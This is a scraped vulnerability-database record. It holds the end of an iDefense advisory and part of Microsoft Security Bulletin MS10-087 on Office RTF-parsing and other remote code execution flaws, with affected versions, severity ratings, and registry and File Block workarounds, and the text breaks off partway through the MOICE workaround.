The most likely exploitation\r\nvector involves convincing a user to open an RTF document sent to the\r\nuser via e-mail or linked on a website.\r\n\r\nSince Outlook 2007 uses the Word engine to process e-mails, it is also\r\naffected by this vulnerability. The attacker can send the user a\r\nspecially crafted RTF e-mail. When this e-mail is opened or displayed\r\nin the preview pane using Outlook 2007, the vulnerability will be\r\ntriggered.\r\n\r\nIV. DETECTION\r\n\r\niDefense has confirmed the existence of this vulnerability in Microsoft\r\nWord 2003, Microsoft Word 2007, and Microsoft Outlook 2007. The\r\nfollowing Microsoft products are vulnerable:\r\n\r\n * Microsoft Office XP SP 3\r\n * Microsoft Office 2003 SP 3\r\n * Microsoft Office 2007 SP 2\r\n * Microsoft Office 2010 (32-bit editions)\r\n * Microsoft Office 2010 (64-bit editions)\r\n * Microsoft Office for Mac 2011\r\n\r\nV. WORKAROUND\r\n\r\nMicrosoft recommends reading e-mail in plain-text format as a\r\nworkaround.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nMicrosoft Corp. has released patches which address this issue.\r\nInformation about downloadable vendor updates can be found by clicking\r\non the URLs shown.\r\nhttp://www.microsoft.com/technet/security/bulletin/MS10-087.mspx\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nname CVE-2010-3333 to this issue. This is a candidate for inclusion in\r\nthe CVE list (http://cve.mitre.org/), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n08/12/2009 Initial Vendor Notification\r\n08/12/2009 Initial Vendor Reply\r\n11/09/2010 Coordinated Public Disclosure\r\n\r\nIX. CREDIT\r\n\r\nThis vulnerability was reported to iDefense by wushi of team509.\r\n\r\nGet paid for vulnerability research\r\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.idefense.com/\r\n\r\nX. 
LEGAL NOTICES\r\n\r\nCopyright \u00a9 2010 iDefense, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDefense. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically,\r\nplease e-mail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\n There are no warranties with regard to this information. Neither the\r\nauthor nor the publisher accepts any liability for any direct,\r\nindirect, or consequential loss or damage arising from use of, or\r\nreliance on, this information.", "edition": 1, "modified": "2010-11-10T00:00:00", "published": "2010-11-10T00:00:00", "id": "SECURITYVULNS:DOC:25114", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25114", "title": "iDefense Security Advisory 11.09.10: Microsoft Word RTF File Parsing Stack Buffer Overflow Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:37", "bulletinFamily": "software", "cvelist": ["CVE-2010-3336", "CVE-2010-3337", "CVE-2010-3334", "CVE-2010-3335", "CVE-2010-3333"], "description": "Microsoft Security Bulletin MS10-087 - Critical\r\nVulnerabilities in Microsoft Office Could Allow Remote Code Execution (2423930)\r\nPublished: November 09, 2010\r\n\r\nVersion: 1.0\r\nGeneral Information\r\nExecutive Summary\r\n\r\nThis security update resolves one publicly disclosed vulnerability and four privately reported vulnerabilities in Microsoft Office. The most severe vulnerability could allow remote code execution if a user opens or previews a specially crafted RTF e-mail message. 
An attacker who successfully exploited any of these vulnerabilities could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nThis security update is rated Critical for all supported editions of Microsoft Office 2007 and Microsoft Office 2010. This security update is also rated Important for all supported editions of Microsoft Office XP, Microsoft Office 2003, Microsoft Office 2004 for Mac, Microsoft Office 2008 for Mac, and Microsoft Office for Mac 2011; and Open XML File Format Converter for Mac. For more information, see the subsection, Affected and Non-Affected Software, in this section.\r\n\r\nThe update addresses the vulnerabilities by modifying the way that Microsoft Office software parses files and by helping to ensure a vulnerable component of Microsoft Office uses a more appropriate and secure search order when loading libraries. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.\r\n\r\nRecommendation. Microsoft recommends that customers apply the update immediately.\r\n\r\nKnown Issues. Microsoft Knowledge Base Article 2423930 documents the currently known issues that customers may experience when installing this security update. The article also documents recommended solutions for these issues. When currently known issues and recommended solutions pertain only to specific releases of this software, this article provides links to further articles.\r\nTop of sectionTop of section\r\nAffected and Non-Affected Software\r\n\r\nThe following software have been tested to determine which versions or editions are affected. Other versions or editions are either past their support life cycle or are not affected. 
To determine the support life cycle for your software version or edition, visit Microsoft Support Lifecycle.\r\n\r\nAffected Software \r\nMicrosoft Office Suite and Other Software\tMaximum Security Impact\tAggregate Severity Rating\tBulletins Replaced by this Update\r\nMicrosoft Office Suites \t \t \t \r\n\r\nMicrosoft Office XP Service Pack 3\r\n(KB2289169)\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-003\r\n\r\nMicrosoft Office 2003 Service Pack 3\r\n(KB2289187)\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nMS10-036\r\n\r\nMicrosoft Office 2007 Service Pack 2\r\n(KB2289158)\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS10-036\r\n\r\nMicrosoft Office 2010 (32-bit editions)\r\n(KB2289161)\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nMicrosoft Office 2010 (64-bit editions)\r\n(KB2289161)\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\nMicrosoft Office for Mac\t \t \t \r\n\r\nMicrosoft Office 2004 for Mac[1]\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nMicrosoft Office 2008 for Mac[1]\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nMicrosoft Office for Mac 2011\r\n(KB2454823)\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nOpen XML File Format Converter for Mac[1]\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\n[1]The security updates for Microsoft Office 2004 for Mac, Microsoft Office 2008 for Mac, and Open XML File Format Converter for Mac are unavailable at this time.\r\n\r\nNon-Affected Software \r\nOffice and Other Software\r\n\r\nMicrosoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats Service Pack 2\r\n\r\nMicrosoft Word Viewer\r\n\r\nMicrosoft Excel Viewer Service Pack 2\r\n\r\nMicrosoft PowerPoint Viewer Service Pack 2\r\n\r\nMicrosoft Visio 
2007 Viewer Service Pack 2\r\n\r\nMicrosoft Visio 2010 Viewer\r\n\r\nMicrosoft Works 9\r\nTop of sectionTop of section\r\n\t\r\nFrequently Asked Questions (FAQ) Related to This Security Update\r\n\r\nWhere are the file information details? \r\nRefer to the reference tables in the Security Update Deployment section for the location of the file information details.\r\n\r\nWhere are the updates for Microsoft Office 2004 for Mac, Microsoft Office 2008 for Mac, and Open XML File Format Converter for Mac? \r\nSecurity updates for Microsoft Office 2004 for Mac, Microsoft Office 2008 for Mac, and Open XML File Format Converter for Mac are unavailable at this time. Microsoft will issue updates for these software when testing is complete, to ensure a high degree of quality for their release.\r\n\r\nWhy does this update address several reported security vulnerabilities? \r\nThis update contains support for several vulnerabilities because the modifications that are required to address these issues are located in related files. Instead of having to install several updates that are almost the same, customers need to install this update only.\r\n\r\nHow is Microsoft Office Outlook affected by these vulnerabilities? \r\nOutlook is not directly affected because the vulnerabilities can only be exploited through Microsoft Word. If Word is the selected e-mail reader, which is the default setting in Microsoft Outlook 2007 and Microsoft Outlook 2010, then an attacker could leverage Outlook for the e-mail attack vector by sending a specially crafted RTF e-mail message to the target user. In this scenario this attack vector requires minimal user action (as in viewing a specially crafted e-mail through the preview pane in Outlook) to be exploited.\r\n\r\nHow are Microsoft Office standalone programs affected by the vulnerabilities? \r\nA Microsoft Office standalone program is affected with the same severity rating as the corresponding Microsoft Office Suite. 
For example, a standalone installation of Microsoft Word is affected with the same severity rating as an installation of the affected Microsoft Office Suite.

I have a non-vulnerable version of software installed, why am I being offered this update?
Some non-affected software, including Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats, Microsoft Word Viewer, Microsoft Excel Viewer, and Microsoft PowerPoint Viewer, contains the vulnerable shared component of Microsoft Office, but because it does not access the vulnerable code, it is not affected by this vulnerability. However, since the vulnerable code is present, this update will be offered.

Does the offer to update a non-vulnerable version of Microsoft Office constitute an issue in the Microsoft update mechanism?
No, the update mechanism is functioning correctly in that it detects a lower version of the files on the system than in the update package and thus offers the update.

I am using an older release of the software discussed in this security bulletin. What should I do?
The affected software listed in this bulletin has been tested to determine which releases are affected. Other releases are past their support life cycle. For more information about the product lifecycle, visit the Microsoft Support Lifecycle Web site.

It should be a priority for customers who have older releases of the software to migrate to supported releases to prevent potential exposure to vulnerabilities. To determine the support lifecycle for your software release, see Select a Product for Lifecycle Information. For more information about service packs for these software releases, see Lifecycle Supported Service Packs.

Customers who require custom support for older software must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options.
Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country in the Contact Information list, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the Microsoft Support Lifecycle Policy FAQ.

Vulnerability Information

Severity Ratings and Vulnerability Identifiers

The following severity ratings assume the potential maximum impact of the vulnerability. For information regarding the likelihood, within 30 days of this security bulletin's release, of the exploitability of the vulnerability in relation to its severity rating and security impact, please see the Exploitability Index in the November bulletin summary. For more information, see Microsoft Exploitability Index.

Vulnerability Severity Rating and Maximum Security Impact by Affected Software

Affected Software | RTF Stack Buffer Overflow Vulnerability - CVE-2010-3333 | Office Art Drawing Records Vulnerability - CVE-2010-3334 | Drawing Exception Handling Vulnerability - CVE-2010-3335 | MSO Large SPID Read AV Vulnerability - CVE-2010-3336 | Insecure Library Loading Vulnerability - CVE-2010-3337 | Aggregate Severity Rating

Microsoft Office Suites
Microsoft Office XP Service Pack 3 | Important, Remote Code Execution | Important, Remote Code Execution | Important, Remote Code Execution | Important, Remote Code Execution | Not applicable | Important
Microsoft Office 2003 Service Pack 3 | Important, Remote Code Execution | Important, Remote Code Execution | Important, Remote Code Execution | Not applicable | Not applicable | Important
Microsoft Office 2007 Service Pack 2 | Critical, Remote Code Execution | Important, Remote Code Execution | Important, Remote Code Execution | Not applicable | Important, Remote Code Execution | Critical
Microsoft Office 2010 (32-bit editions) | Critical, Remote Code Execution | Important, Remote Code Execution | Important, Remote Code Execution | Not applicable | Important, Remote Code Execution | Critical
Microsoft Office 2010 (64-bit editions) | Critical, Remote Code Execution | Important, Remote Code Execution | Important, Remote Code Execution | Not applicable | Important, Remote Code Execution | Critical

Microsoft Office for Mac
Microsoft Office 2004 for Mac | Important, Remote Code Execution | Important, Remote Code Execution | Important, Remote Code Execution | Important, Remote Code Execution | Not applicable | Important
Microsoft Office 2008 for Mac | Important, Remote Code Execution | Important, Remote Code Execution | Important, Remote Code Execution | Important, Remote Code Execution | Not applicable | Important
Microsoft Office for Mac 2011 | Important, Remote Code Execution | Not applicable | Important, Remote Code Execution | Important, Remote Code Execution | Not applicable | Important
Open XML File Format Converter for Mac | Important, Remote Code Execution | Important, Remote Code Execution | Important, Remote Code Execution | Important, Remote Code Execution | Not applicable | Important

RTF Stack Buffer Overflow Vulnerability - CVE-2010-3333

A remote code execution vulnerability exists in the way that affected Microsoft Office software parses specially crafted Rich Text Format (RTF) data. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

To view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-3333.

Mitigating Factors for RTF Stack Buffer Overflow Vulnerability - CVE-2010-3333

Mitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:

• An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

• In a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker’s Web site, and then convince them to open the specially crafted Office file.

Workarounds for RTF Stack Buffer Overflow Vulnerability - CVE-2010-3333

Workaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:

• Read e-mails in plain text

To help protect yourself from the e-mail attack vector, read e-mail messages in plain text format.

Microsoft Office Outlook 2002 users who have applied Office XP Service Pack 1 or a later version can enable this setting and view in plain text only those e-mail messages that are not digitally signed or e-mail messages that are not encrypted.

Digitally signed e-mail messages or encrypted e-mail messages are not affected by the setting and may be read in their original formats. For more information about how to enable this setting in Outlook 2002, see Microsoft Knowledge Base Article 307594.

Impact of workaround. E-mail messages that are viewed in plain text format will not contain pictures, specialized fonts, animations, or other rich content.
Additionally:
- The changes are applied to the preview pane and to open messages.
- Pictures become attachments so that they are not lost.
- Because the message is still in Rich Text or HTML format in the store, the object model (custom code solutions) may behave unexpectedly.

• Use Microsoft Office File Block policy to block the opening of RTF documents from unknown or untrusted sources and locations

The following registry scripts can be used to set the File Block policy.

Note Modifying the Registry incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from incorrect modification of the Registry can be solved. Modify the Registry at your own risk.

For Office 2003

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security\FileOpenBlock]
"RtfFiles"=dword:00000001

Note In order to use 'FileOpenBlock' with Microsoft Office 2003, all of the latest security updates for Microsoft Office 2003 must be applied.

For Office 2007

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\12.0\Word\Security\FileOpenBlock]
"RtfFiles"=dword:00000001

Note In order to use 'FileOpenBlock' with Microsoft Office 2007, all of the latest security updates for Microsoft Office 2007 must be applied.

For Office 2010

Open Word 2010 and follow the steps below:

1. Click the File tab.
2. Under Help, click Options.
3. Click Trust Center, and then click Trust Center Settings.
4. In the Trust Center, click File Block Settings.
5. Ensure the Open check box is selected for the following file types:
   - RTF Files
6. Under Open behavior for selected file types, select "Do not open selected file types" or select "Open selected file types in Protected View". Either choice will block the attack vector to the vulnerable code.
7. Click OK to apply the File Block Settings.

Alternatively, file block can be applied using Group Policy. For more information, see the TechNet article, Plan file block settings for Office 2010.

Impact of workaround. Users who have configured the File Block policy and have not configured a special exempt directory or have not moved files to a trusted location as discussed in Microsoft Knowledge Base Article 922848 will be unable to open RTF files in Office 2003 or 2007 Microsoft Office System. For Microsoft Office 2010, RTF files will either be blocked from opening or will be opened in protected mode depending on the open behavior that was selected.

How to undo the workaround.

For Office 2003

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security\FileOpenBlock]
"RtfFiles"=dword:00000000

For 2007 Office system

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\12.0\Word\Security\FileOpenBlock]
"RtfFiles"=dword:00000000

For Office 2010

Open Word 2010 and follow these steps:

1. Click the File tab.
2. Under Help, click Options.
3. Click Trust Center, and then click Trust Center Settings.
4. In the Trust Center, click File Block Settings.
5. Clear the Open check box for the file types that you previously selected.
6. Click OK to apply the File Block settings.

FAQ for RTF Stack Buffer Overflow Vulnerability - CVE-2010-3333

What is the scope of the vulnerability?
This is a remote code execution vulnerability.
An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

What causes the vulnerability?
When Microsoft Office software parses specially crafted RTF-formatted data, system memory may be corrupted in such a way that an attacker could execute arbitrary code.

What is RTF?
Rich Text Format (RTF) is a method of encoding formatted text and graphics for use within applications and for transfer between applications. Users often depend on special translation software to move word-processing documents between various applications developed by different companies. RTF serves as a standard for data transfer between word processing software, for document formatting, and as a means of migrating content from one operating system to another.

What might an attacker use the vulnerability to do?
An attacker who successfully exploited this vulnerability could cause arbitrary code to run with the privileges of the user who opens a specially crafted RTF file or previews or opens a specially crafted RTF e-mail message. If the user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

How could an attacker exploit the vulnerability?
This vulnerability requires that a user open or preview specially crafted RTF-formatted data with an affected version of Microsoft Office software.

In an e-mail attack scenario, an attacker could exploit the vulnerability by sending specially crafted RTF-formatted data in the contents of an e-mail message. The vulnerability could be exploited when the specially crafted RTF e-mail message is previewed or opened in Outlook while using Word as the e-mail viewer. An attacker could also exploit the vulnerability by sending a specially crafted RTF file as an attachment and convincing the user to open the specially crafted RTF file.

In a Web-based attack scenario, an attacker could host a Web site that contains an Office file that is used to attempt to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content could contain specially crafted content that could exploit this vulnerability. An attacker would have no way to force users to visit a specially crafted Web site. Instead, an attacker would have to convince them to visit the Web site, typically by getting them to click a link that takes them to the attacker's site, and then convince them to open the specially crafted Office file.

How is Microsoft Office affected by this vulnerability?
Although the known attack vectors can only leverage Microsoft Word, the vulnerable code exists in a shared component of Microsoft Office.

What systems are primarily at risk from the vulnerability?
Systems where Microsoft Office software is used, including workstations and terminal servers, are primarily at risk. Servers could be at more risk if administrators allow users to log on to servers and to run programs. However, best practices strongly discourage allowing this.

What does the update do?
The update addresses the vulnerability by modifying the way that Microsoft Office parses RTF-formatted data.

When this security bulletin was issued, had this vulnerability been publicly disclosed?
No. Microsoft received information about this vulnerability through coordinated vulnerability disclosure.

When this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?
No. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.

Office Art Drawing Records Vulnerability - CVE-2010-3334

A remote code execution vulnerability exists in the way that Microsoft Office software parses specially crafted Office files. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

To view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-3334.

Mitigating Factors for Office Art Drawing Records Vulnerability - CVE-2010-3334

Mitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:

• The vulnerability cannot be exploited automatically through e-mail.
For an attack to be successful, a user must open an attachment that is sent in an e-mail message.

• An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

• In a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker’s Web site, and then convince them to open the specially crafted Office file.

Workarounds for Office Art Drawing Records Vulnerability - CVE-2010-3334

Workaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:

• Use Microsoft Office File Block policy to block the opening of Office 2003 and earlier documents in Microsoft Word from unknown or untrusted sources and locations

The following registry scripts can be used to set the File Block policy.

Note Modifying the Registry incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from incorrect modification of the Registry can be solved. Modify the Registry at your own risk.

For Office 2003

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security\FileOpenBlock]
"BinaryFiles"=dword:00000001

Note In order to use 'FileOpenBlock' with Microsoft Office 2003, all of the latest security updates for Microsoft Office 2003 must be applied.

For Office 2007

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\12.0\Word\Security\FileOpenBlock]
"BinaryFiles"=dword:00000001

Note In order to use 'FileOpenBlock' with Office 2007, all of the latest security updates for Microsoft Office 2007 must be applied.

For Office 2010

Open Word 2010 and follow the steps below:

1. Click the File tab.
2. Under Help, click Options.
3. Click Trust Center, and then click Trust Center Settings.
4. In the Trust Center, click File Block Settings.
5. Ensure the Open check box is selected for the following file types:
   - Word 2003 Binary Documents and Templates
   - Word XP Binary Documents and Templates
   - Word 2000 Binary Documents and Templates
   - Word 97 Binary Documents and Templates
   - Word 95 Binary Documents and Templates
   - Word 6.0 Binary Documents and Templates
   - Word 2 and earlier Binary Documents and Templates
6. Under Open behavior for selected file types, select "Do not open selected file types" or select "Open selected file types in Protected View". Either choice will block the attack vector to the vulnerable code.
7. Click OK to apply the File Block Settings.

Alternatively, file block can be applied using Group Policy. For more information, see the TechNet article, Plan file block settings for Office 2010.

Impact of workaround. For Microsoft Office 2003 and Microsoft Office 2007, users who have configured the File Block policy and have not configured a special exempt directory or have not moved files to a trusted location as discussed in Microsoft Knowledge Base Article 922848 will be unable to open Office 2003 files or earlier versions. For Microsoft Office 2010, Office 2003 files or earlier versions will either be blocked from opening or will be opened in protected mode depending on the open behavior that was selected.

How to undo the workaround.

For Office 2003

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security\FileOpenBlock]
"BinaryFiles"=dword:00000000

For Office 2007

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\12.0\Word\Security\FileOpenBlock]
"BinaryFiles"=dword:00000000

For Office 2010

Open Word 2010 and follow these steps:

1. Click the File tab.
2. Under Help, click Options.
3. Click Trust Center, and then click Trust Center Settings.
4. In the Trust Center, click File Block Settings.
5. Clear the Open check box for the file types that you previously selected.
6. Click OK to apply the File Block settings.

• Use Microsoft Office File Block policy to block the opening of Office 2003 and earlier documents in Microsoft Excel from unknown or untrusted sources and locations

The following registry scripts can be used to set the File Block policy.

Note Modifying the Registry incorrectly can cause serious problems that may require you to reinstall your operating system.
Microsoft cannot guarantee that problems resulting from incorrect modification of the Registry can be solved. Modify the Registry at your own risk.

For Office 2003

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Excel\Security\FileOpenBlock]
"BinaryFiles"=dword:00000001

Note In order to use 'FileOpenBlock' with Microsoft Office 2003, all of the latest security updates for Microsoft Office 2003 must be applied.

For Office 2007

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\12.0\Excel\Security\FileOpenBlock]
"BinaryFiles"=dword:00000001

Note In order to use 'FileOpenBlock' with Microsoft Office 2007, all of the latest security updates for Office 2007 must be applied.

For Office 2010

Open Excel 2010 and follow the steps below:

1. Click the File tab.
2. Under Help, click Options.
3. Click Trust Center, and then click Trust Center Settings.
4. In the Trust Center, click File Block Settings.
5. Ensure the Open check box is selected for the following file types:
   - Excel 2007 and later Binary Workbooks
   - Excel 97-2003 Add-in Files
   - Excel 97-2003 Workbooks and Templates
   - Excel 95-97 Workbooks and Templates
   - Excel 95 Workbooks
   - Excel 4 Workbooks
   - Excel 4 Worksheets
   - Excel 3 Worksheets
   - Excel 2 Worksheets
6. Under Open behavior for selected file types, select "Do not open selected file types" or select "Open selected file types in Protected View". Either choice will block the attack vector to the vulnerable code.
7. Click OK to apply the File Block Settings.

Alternatively, file block can be applied using Group Policy.
For more information, see the TechNet article, Plan file block settings for Office 2010.

Impact of workaround. For Microsoft Office 2003 and Microsoft Office 2007, users who have configured the File Block policy and have not configured a special exempt directory or have not moved files to a trusted location as discussed in Microsoft Knowledge Base Article 922848 will be unable to open Office 2003 files or earlier versions. For Microsoft Office 2010, Office 2003 files or earlier versions will either be blocked from opening or will be opened in protected mode depending on the open behavior that was selected.

How to undo the workaround.

For Office 2003

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Excel\Security\FileOpenBlock]
"BinaryFiles"=dword:00000000

For Office 2007

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\12.0\Excel\Security\FileOpenBlock]
"BinaryFiles"=dword:00000000

For Office 2010

Open Excel 2010 and follow these steps:

1. Click the File tab.
2. Under Help, click Options.
3. Click Trust Center, and then click Trust Center Settings.
4. In the Trust Center, click File Block Settings.
5. Clear the Open check box for the file types that you previously selected.
6. Click OK to apply the File Block settings.

• Use Microsoft Office File Block policy to block the opening of Office 2003 and earlier documents in Microsoft PowerPoint from unknown or untrusted sources and locations

The following registry scripts can be used to set the File Block policy.

Note Modifying the Registry incorrectly can cause serious problems that may require you to reinstall your operating system.
Microsoft cannot guarantee that problems resulting from incorrect modification of the Registry can be solved. Modify the Registry at your own risk.

For Office 2003

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\PowerPoint\Security\FileOpenBlock]
"BinaryFiles"=dword:00000001

Note In order to use 'FileOpenBlock' with Microsoft Office 2003, all of the latest security updates for Microsoft Office 2003 must be applied.

For Office 2007

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\12.0\PowerPoint\Security\FileOpenBlock]
"BinaryFiles"=dword:00000001

Note In order to use 'FileOpenBlock' with the 2007 Microsoft Office system, all of the latest security updates for the 2007 Microsoft Office system must be applied.

For Office 2010

Open PowerPoint 2010 and follow the steps below:

1. Click the File tab.
2. Under Help, click Options.
3. Click Trust Center, and then click Trust Center Settings.
4. In the Trust Center, click File Block Settings.
5. Ensure the Open check box is selected for the following file types:
   - PowerPoint 97-2003 Presentations, Shows, Templates and Add-in Files
6. Under Open behavior for selected file types, select "Do not open selected file types" or select "Open selected file types in Protected View". Either choice will block the attack vector to the vulnerable code.
7. Click OK to apply the File Block Settings.

Alternatively, file block can be applied using Group Policy. For more information, see the TechNet article, Plan file block settings for Office 2010.

Impact of workaround. For Microsoft Office 2003 and Microsoft Office 2007, users who have configured the File Block policy and have not configured a special exempt directory or have not moved files to a trusted location as discussed in Microsoft Knowledge Base Article 922848 will be unable to open Office 2003 files or earlier versions. For Microsoft Office 2010, Office 2003 files or earlier versions will either be blocked from opening or will be opened in protected mode depending on the open behavior that was selected.

How to undo the workaround.

For Office 2003

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\PowerPoint\Security\FileOpenBlock]
"BinaryFiles"=dword:00000000

For Office 2007

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\12.0\PowerPoint\Security\FileOpenBlock]
"BinaryFiles"=dword:00000000

For Office 2010

Open PowerPoint 2010 and follow these steps:

1. Click the File tab.
2. Under Help, click Options.
3. Click Trust Center, and then click Trust Center Settings.
4. In the Trust Center, click File Block Settings.
5. Clear the Open check box for the file types that you previously selected.
6. Click OK to apply the File Block settings.

• Use the Microsoft Office Isolated Conversion Environment (MOICE) when opening files from unknown or untrusted sources

The Microsoft Office Isolated Conversion Environment (MOICE) helps protect Office 2003 installations by more securely opening Word, Excel, and PowerPoint binary format files.

To install MOICE, you must have Office 2003 or Office 2007 installed.

To install MOICE, you must also have the Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats.
The compatibility pack is available as a free download from the Microsoft Download Center.

MOICE requires all updates that are recommended for all Office programs. Visit Microsoft Update to install all recommended updates.

Enable MOICE

Note: See Microsoft Knowledge Base Article 935865 to use the automated Microsoft Fix it solution to enable or disable this workaround.

To manually enable MOICE, run the commands as specified in the following table. Running the commands will associate the Office application extensions with MOICE.

Command to enable MOICE to be the registered handler

For Word, run the following command from a command prompt:
ASSOC .doc=oice.word.document

For Excel, run the following commands from a command prompt:
ASSOC .XLS=oice.excel.sheet
ASSOC .XLT=oice.excel.template
ASSOC .XLA=oice.excel.addin

For PowerPoint, run the following commands from a command prompt:
ASSOC .PPT=oice.powerpoint.show
ASSOC .POT=oice.powerpoint.template
ASSOC .PPS=oice.powerpoint.slideshow

Note: On Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2, run the above commands from an elevated command prompt.

For more information on MOICE, see Microsoft Knowledge Base Article 935865.

Impact of workaround. Office 2003 and earlier formatted documents that are converted to the Microsoft Office 2007 Open XML format by MOICE will not retain macro functionality. Additionally, documents with passwords or that are protected with Digital Rights Management cannot be converted.

How to undo the workaround. Run the commands to disable MOICE as specified in the table below.

Command to disable MOICE as the registered handler

For Word, run the following command from a command prompt:
ASSOC .doc=Word.Document.8

For Excel, run the following commands from a command prompt:
